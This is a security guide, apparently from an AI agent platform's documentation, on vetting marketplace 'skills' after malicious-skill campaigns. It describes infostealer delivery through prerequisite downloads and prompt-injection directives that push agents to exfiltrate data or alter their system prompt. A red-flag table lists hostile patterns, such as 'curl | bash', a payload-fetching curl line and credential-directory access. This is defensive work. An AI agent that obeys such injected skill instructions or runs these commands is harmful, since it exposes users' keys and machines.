Skill Verification
Given the malicious skills incidents, always review skills before installing them. Researchers found 341 malicious skills on ClawHub, 283 leaking credentials, and 36% of all skills containing security flaws. This is the first documented supply-chain attack targeting AI agent skills.
Supply Chain Risk
Snyk's ToxicSkills study found that 91% of malicious skills use a hybrid attack combining prompt injection with traditional malware. A skill doesn't need to contain malicious code — it can instruct the AI to execute malicious actions through its prompts.
The Threat Landscape
What Was Found on ClawHub
| Study | Skills Analyzed | Malicious / Flawed | Key Finding |
|---|---|---|---|
| Koi Security | 2,857 | 341 malicious (12%) | ClawHavoc campaign — 335 skills distributing AMOS malware |
| Snyk ToxicSkills | 3,984 | 1,467 flawed (36%), 534 critical (13.4%), 76 confirmed malicious | First documented AI agent supply-chain attack |
| Snyk Credential Leaks | 3,984 | 283 leaking credentials (7.1%) | Popular skills force agents to pass API keys through LLM context |
| Bitdefender | ~4,500 | ~900 malicious (~20%) | Nearly 1 in 5 skills contained malicious content |
| Cisco AI Defense | Top skill | 9 vulnerabilities (2 critical) | Data exfiltration and prompt injection without user awareness |
How Malicious Skills Work
Traditional malware approach (ClawHavoc):
- Skill includes a "Prerequisites" section
- Instructions tell users to download a password-protected ZIP or run an obfuscated shell script
- The ZIP contains Atomic Stealer (AMOS) — a macOS infostealer targeting Keychain passwords, browser credentials, crypto wallets
- The skill itself may be functional, providing cover for the malware
Prompt injection approach (91% of attacks):
- Skill instructions contain hidden directives for the AI
- The AI is instructed to exfiltrate data, create backdoors, or modify
SOUL.md - No traditional malware is needed — the agent's own capabilities are weaponized
- Example: A "What Would Elon Do?" skill silently exfiltrated data using prompt injection
Credential leak approach (283 skills):
- Functional skills (like
moltyverse-email,youtube-data) instruct agents to pass API keys through the LLM context window - Keys appear in plaintext in output logs and Markdown artifacts
- If an agent has previously handled an API key, a prompt-log skill can re-expose it
Pre-Installation Checklist
1. Check the Security Report
openclaw clawhub security-report <skill-name>
This shows:
- VirusTotal scan results (SHA-256 hash checked on upload)
- Code Insight analysis (Gemini-powered deep package analysis)
- Code safety scanner findings
- Community reports/flags
- Publication date and update history
2. Check Against Koi Security's Database
Clawdex is Koi Security's pre-installation scanning tool:
# Before installing any skill, check it against the malicious skills database
openclaw clawhub check <skill-name> # Uses Clawdex integration
If the skill was flagged in any audit, you'll know before it executes.
3. Review the Source
# View the full skill source
openclaw clawhub view <skill-name>
# Download to a review directory first
openclaw clawhub download <skill-name> --to ~/review/
Look for red flags:
| Red Flag | Example | Risk |
|---|---|---|
curl | bash in pre_install | Downloading and executing unknown scripts | Malware installation |
| Obfuscated code | Base64-encoded commands, packed scripts | Hidden malicious behavior |
| Excessive tool requests | Skill requesting shell + browser + http for a simple task | Over-privileged |
| Hardcoded external URLs | curl https://random-domain.xyz/payload | Data exfiltration |
~/.ssh or ~/.aws access | Reading credential directories | Credential theft |
| "Prerequisites" with downloads | "Download this ZIP first" or "Run this script" | AMOS malware delivery |
| Password-protected archives | ZIP files requiring passwords to open | Anti-analysis evasion |
| Prompt injection patterns | Hidden instructions in skill descriptions | Agent hijacking |
| Requests to modify SOUL.md | "Update your system prompt to include..." | Persistent backdoor |
4. Check the Author
openclaw clawhub author <author-name>
- How many skills have they published?
- How old is their account? (ClawHub only required a 1-week-old GitHub account to publish)
- Do other skills have positive reviews?
- Is the author verified?
5. Check Community Signal
- Look at install count and ratings
- Search for the skill name on Discord/GitHub issues
- New skills with zero reviews deserve extra scrutiny
- Skills flagged with 3+ unique community reports are auto-hidden
Safe Installation Practices
# Install with sandbox (skills can't escape the sandbox)
openclaw clawhub install <skill-name> --sandbox
# Install but don't grant shell access
openclaw clawhub install <skill-name> --no-shell
# Install to a review directory first
openclaw clawhub download <skill-name> --to ~/review/
# ... review the files manually ...
openclaw skill install ~/review/<skill-name>.md
Principle of Least Privilege
Not every skill needs every capability:
| Skill Type | Appropriate Permissions |
|---|---|
| Information lookup | HTTP only, no shell, no filesystem |
| Code formatting | Filesystem (read), no shell, no network |
| Deployment automation | Shell (limited), filesystem (write to specific paths) |
| Browser tasks | Browser (specific domains), no shell |
Automated Scanning
Built-in Code Safety Scanner (v2026.2.6+)
# Scan a specific skill file
openclaw security scan ./skill.md
# Scan all installed skills
openclaw security scan --all
The scanner checks for:
- Shell injection patterns
- Network exfiltration attempts
- Credential access attempts
- Known malicious code signatures
- Suspicious
pre_install/post_installhooks
VirusTotal Integration (v2026.2.6+)
All ClawHub skill uploads are now scanned:
- SHA-256 hashing on upload — checked against VirusTotal database
- Code Insight (Gemini-powered) — deep analysis of full package contents
- Daily re-scanning — active skills re-scanned to detect skills that become malicious after initial upload
- Verdicts: Benign (auto-approved), Suspicious (warning shown), Malicious (immediately blocked)
Third-Party Scanning Tools
| Tool | What It Does |
|---|---|
| Clawdex | Pre-installation check against Koi Security's malicious skills database |
| SkillGuard | File scanner for vulnerability patterns and malicious indicators |
| SafeClaw Scanner | Detects prompt injections, backdoor commands, obfuscated code, excessive permissions |
| Snyk mcp-scan | Free Python tool powered by Snyk ML model — scans MCP servers and agent skills |
Disable ClawHub Entirely
For maximum security, disable skill installation completely:
~/.openclaw/config.yml
skills:
allow_install: false
allow_clawhub: false
Post-Incident: If You Installed a Malicious Skill
- Remove the skill immediately:
openclaw skill remove <skill-name> - Rotate ALL API keys the agent had access to
- Check
SOUL.mdfor unauthorized modifications - Review scheduled tasks for persistence mechanisms
- Scan for malware — run your OS antivirus/malware scanner
- Check browser profiles — look for stolen sessions/cookies
- Review audit logs for exfiltration activity
- Run
openclaw security audit --deepto verify system state
Reporting Malicious Skills
# Report a malicious skill on ClawHub
openclaw clawhub report <skill-name> --reason "malicious"
# Or report via GitHub
# https://github.com/openclaw/openclaw/security/advisories
Skills with 3+ unique reports are auto-hidden from the marketplace.
See Also
- Known Vulnerabilities — Full incident history including ClawHavoc
- Security Hardening — Defense-in-depth configuration
- ClawHub Guide — Safe marketplace usage
- Ecosystem — Security tools